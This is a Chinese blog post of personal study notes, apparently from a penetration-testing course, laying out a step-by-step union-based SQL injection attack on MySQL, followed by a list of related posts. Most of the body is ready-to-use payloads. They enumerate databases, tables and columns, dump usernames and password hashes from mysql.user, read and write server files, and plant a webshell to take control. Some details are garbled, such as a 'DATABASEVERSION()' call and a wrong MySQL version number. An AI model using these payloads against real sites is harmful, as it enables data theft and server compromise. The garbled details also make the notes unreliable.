SQL注入笔记01:基于union的注入

最新推荐文章于 2023-07-11 16:00:52 发布
最新推荐文章于 2023-07-11 16:00:52 发布
阅读量1.2k 收藏 2
点赞数 1
分类专栏: 渗透:SQL注入 文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ONS_cukuyo/article/details/82703854
版权

 

(笔记内容来自小迪8,用以方便查看)

以下内容都以(url)?id=3为例,比如www.xx.com?id=3

******************************************************************
思路:获取表列数目用以后续查询
          -》获取当前查询属于哪个数据库和数据库版本等系统信息
          -》查询有哪些数据库(跨站注入)
          -》查询指定数据库有哪些表
          -》查询指定表有哪些列
1、获取表列数目用以后续查询
注入:(url)?id=3 order by X //X为数字,需尝试得出,后续都假设X=5


2、查询数据库名、版本号、当前用户等系统信息
VERSION()        返回数据库的版本号
CONNECTION_ID()         返回服务器的连接数
DATABASE()、SCHEMA()    返回当前数据库名
USER()、SYSTEM_USER()、SESSION_USER()、CURRENT_USER()返回当前用户
@@version_compile_os          操作系统名

注入:(url)?id=3 union select DATABASEVERSION(),USER(),1,2
其他函数用法也是一样的


3、查询所有数据库名字
注入:(url)?id=3 union SELECT schema_name,1,2,3,4 FROM information_schema.SCHEMATA
information_schema:存储所有数据库属性信息的数据库,只有MYSQL>=15版本才有这个数据库
information_schema.SCHEMATA:存储数据库名的表


4、查询数据库里的表项、表的列项                                                  
查询数据库里的表项:(url)?id=3 UNION SELECT table_name,2,3,4,5 FROM information_schema.TABLES WHERE table_schema='world' 

information_schema.TABLES:存储所有数据库表名的表
table_schema='world' :查询数据库world下有哪些表

查询表的列项:(url)?id=3 UNION SELECT column_name,2,3,4,5 FROM information_schema.COLUMNS WHERE table_name='city' AND table_schema='world'

information_schema.COLUMNS:存储所有表字段信息的表
table_name='city':指定表名为city
table_schema='world':指定数据库名为world

注意:
1、table_schema='world'必须加,不加的话会把其他数据库的city表里的字段信息也查询出来
******************************************************************


5、查询数据库用户名和密码
注入:(url)?id=3 union SELECT USER, authentication_string,1,2,3 FROM mysql.user 
注:密码是被加密的形式,登陆mysql数据库时,数据库系统会将你输入的密码先通过函数进行加密,然后再与数据库中的密码进行比较,匹配成功才可以登录。


6、读取和写入文件
读取:(url)?id=3 union select load_file 'e:/asd.txt';
写入:(url)?id=3 union select '123' into outfile 'e:/123.txt'
注:需root用户,其他用户读取为NULL,写入会出现Access denied

关于网站路径的获取:
    1、报错显示
    2、谷歌黑客
    3、读取搭建平台配置文件
    4、漏洞报错
    5、遗留文件
    6、字典猜解
此注入可用于读取和写入文件,比如直接将一句话木马放入web目录下即可拿到权限
注:路径符号及编码,比如union后面的语句里有'\n',或者存在安全的函数会将指定符号前加入转义符(load_file 'e:/asd.txt'->load_file \'e:/asd.txt\',这样就会语法有错),解决办法是直接传16进制编码(可选工具是"转换工具 by zj1244[小葵]")

7、跨库注入
网站A->数据库A,无注入点
网站B->数据库B,有注入点
且,数据库A和数据库B属于同一个MYSQL。这时候就可以用上面的注入获取所有数据库名->获取数据库A的所有信息
注:1、需要root权限,只有root权限才可以看所有数据库的信息,除非网站B的MYSQL登陆用户也拥有数据库A的权限
       2、SQL注入时一定加上数据库A的前缀,否则可能会出错,如:select name,1,2 from 数据库A.user

8、注入地点
GET、POST、COOKIE、HTTP头部

柴月和岐月
关注
专栏目录
SQL注入漏洞复现:探索不同类型的注入攻击方法
weixin_43263566的博客
08-26 1382
基于错误的注入(Error-based Injection):攻击者通过构造恶意的SQL语句,利用应用程序返回的错误信息来获取数据库中的敏感信息。基于联合查询的注入Union-based Injection):攻击者通过在注入点处构造特殊的SQL语句,利用UNION命令将其他查询结果合并到原始查询中,从而获取额外的数据。基于时间延迟的注入(Time-based Injection):攻击者通过在注入点处构造特殊的SQL语句,
SQL注入笔记
weixin_42695055的博客
12-28 1170
利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。
SQL之Union查询注入
帅醉了的博客
03-03 658
0x00_简介 Union操作符是用于合并两个或者多个select语句的搜索结果集。 在sql注入攻击中,要使union成功执行,必须要满足四个条件: 1、与内部数据库具有相同的字段数。 2、列是相同的数据类型。 3、select语句中的顺序必须相同。 4、当前页面有回显点。 0x01_Union注入一般步骤 order by 判断字段 查看回显数据位置 读库信息 读表信息 读字段 读数据 0...
SQL注入-UNION注入
李二胖的博客
04-16 199
SQL注入攻击union注入攻击 union注入攻击 使用wamp构造测试环境 通过以上两步发现数据库表字段数为3随后执行union select 1,2,3,并将ID值设置为-1可以返回union select的结果 在2和3的位置可以执行一些查询命令,在2的位置查询数据库名 得知数据库名后可以进行表名查询 尝试查询字段名 获取字段数据 ...
SQL注入(一)之union注入
木尤的博客
07-08 3029
SQL注入(一)之union注入SQL注入的前期,第一件事情就是找到SQL注入点,在找到注入点后开始下面的内容: 一、联合查询法(一) a.判断注入点: and 1=1 --返回true,显示正常 and 1=2 --返回false,显示错误 b.猜多少列 order by [数值] c.联合查询猜表名 union select 1,2,3,……,7 from users --猜表名并记录返回回显位(报错说明表不存在,将表名更换继续猜) d.联合查询猜列名 union select 1,2,u
sql注入-union注入union函数 联合注入
最新发布
07-11 7429
union注入】可与报错注入、盲注、堆叠注入等方法结合使用
Union注入攻击
JieDG的博客
05-19 667
Union联合查询 Union联合、合并:将多条查询语句的结果合并成一个结果,union 注入攻击为一种手工测试。 Union联合注入思路 A:判断是否存在注入点 http://127.0.0.1/web/sql/union.php?id=1 1' 异常 1 and 1=1 返回结果和id=1一样 1 and 1=2 异常从而则一定存在SQL注入漏洞 B:order by 1-99 语句来查询该数据表的字段数量 Id=1 order by 1-99 来判断字段数 C:利用获得的列数使用联合查询,unio
SQL注入基础 union(一)
hunter_76的博客
09-02 102
Mysql为例: 需要记住几个函数 database() version() user() 内联注释 index.php?id=-15 /*!union*/ /*!select/ 1,2,3 注意:SQL语句中可以尝试空格代替“+”,或“+”代替空格 例如: index.php?id=1 and 1=2 index.php?id=1+and+1=2 数字型 union注入 id = 1 and 1=1 //网页正常 id = 1 and 1=2 //网页不正常 order b
第三天sql注入基础&UNION注入
代码审计
03-04 501
联合查询注入 SQL注入(Sql Injection ) 是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击(有可利用的参数点),这些参数传递给后台的SQL数据库加以解析并执行。(有可以控制的利用点),我们可以通过构造特定的结构,让mysql 或者其他的数据库执行我们想要的操作 哪里存在SQL注入? GET POST HTTP头部注入 Cookie注入 任何客户端可控,传递到服务器的变量。 并且和数据库进行交互,都有可能存在sql注入 在知道查询语句.
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
手工注入常用SQL语句笔记.docx
04-10
手工注入常用 SQL 语句笔记 手工注入是指攻击者通过构造特殊的输入来inject恶意的 SQL 代码,使得数据库执行恶意的操作。手工注入常用 SQL 语句笔记对 MySQL 和 MSSQL 两种数据库管理系统进行了详细的介绍。 一、...
SQL注入(自学笔记
woqusss的博客
08-10 374
SQL注入当属漏洞之王,具有高危害性,且利用条件低,利用以及绕过检测方式多种多样。这篇笔记主要从SQL注入的危害性,以及SQL注入的条件,注入点的判断以及寻找,注入的方式以及类型,不同业务场景下对应的不同query方式利用,成功注入后应该进行的步骤,在具有root高权限账户时候应该进行的操作下,防御以及后端过滤方式和Waf绕过,一些本人见过的查询语句闭合方式。...
SQL注入union 联合注入
weixin_53711701的博客
01-16 4702
SQL注入union联合注入
sql注入实战—union注入
qq_40909772的博客
07-12 793
测试网站:自建靶场 http://192.168.57.128:1237/sql/union.php?id=1 测试工具:Burp Suite 1.注入过程。 1.1 访问该地址使用burp抓包,返回的结果如下。 1.2 在URL后添加一个单引号,再次访问,返回的结果与id=1不相同。 1.3 继续修改URL,访问id=1 and 1=1,由于and 1=1为真,所以页面应返回与id=1相同的结果,访问id=1 and 1=2,由于and 1=2为假,所以页面应返回与id=1不同的结果,如下图所示。   由
实验10:union注入
qq_44720671的博客
03-31 293
基于union联合查询信息获取 union联合查询:可通过联合查询来查询指定数据 例:select username,password from user where id=1 union select 字段1,字段2 from 表名.。 【注:联合查询的字段数要和主查询一致!!!】 【查询字段扩展:version()数据库版本,database()当前的数据库名,user()用户名】 我们以Pi...
sql注入 union联合查询
hussu的博客
03-05 547
sql注入原理:参数用户可控:前端传给后端的参数内容时用户可以控制的 参数带入数据库查询:传入的参数拼接到sql语句,且带入数据库查询。 mysql 5.0版本之后,mysql默认在数据库中存放一个 information_schema 的数据库(information_schema.tables table_name column_name) mysql中常见注释方式有# 或--空格 或/**/(其中内联注释/*! union ....*/可以绕waf,原理:当!后面所接的数据库版本号时,当实际
union注入
qq_42764906的博客
03-29 412
union基本语法如下: 注:前面有几个信息 后面有几个字段 之后先检查有几个字段 得到 我们将其换成3 得到 换成2 得到 得到字段为2 于是我们输入union语句 a’ union select database(),user()# 得到 如果想得到版本号 a’ union select version(),4# database() 数据名称 uid user() 数据emai...
N9-SQL注入union注入
尐猴子君ii的博客
04-01 853
今天猴子君要向大家介绍的是SQL注入union章节。 首先打开pikachu渗透测试平台。 找到sql字符型注入的章节。 union语句为数据库联合语句,用法如下: SELECT 字段1,字段2 from 表名 where 条件 union SELECT 字段1,字段2 from 表名 where 条件 而union联合字段后面的查询字段的个数要与前面的字段个数相同,所以我们可以使用 ...
挖洞入门_unionSQL注入
c4y345的博客
06-21 937
简介:在漏洞盒子挖洞已经有一段时间了,虽说还不是大佬,但技术也有所进步,安全行业就是这样,只有自己动手去做,才能将理论的知识变为个人的经验。本篇文章打算分享一下我在挖显错型SQL注入漏洞过程中的一些个人理解,如有不足也请大佬不吝指教。 0x00:什么是SQL注入 SQL注入,相信大多数人一开始接触安全,听说的第一种漏洞类型就会是SQL注入,众所周知,其本质就是将用户输入的数据当成了SQL语句来执行。 开发过网站的朋友应该都清楚,大多数的小型企业或个人的站点大都采用了LAMP结构,即Linux + Apach
SQL注入攻防手册:MySQL与MSSQL函数与技巧
"这篇文档是关于手工SQL注入的常用语句和技巧的笔记,主要针对MySQL,也涉及了一些MSSQL的相关知识。" 在网络安全领域,SQL注入是一种常见的攻击手段,通过利用应用程序对用户输入数据的不当处理,使得恶意用户能够...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值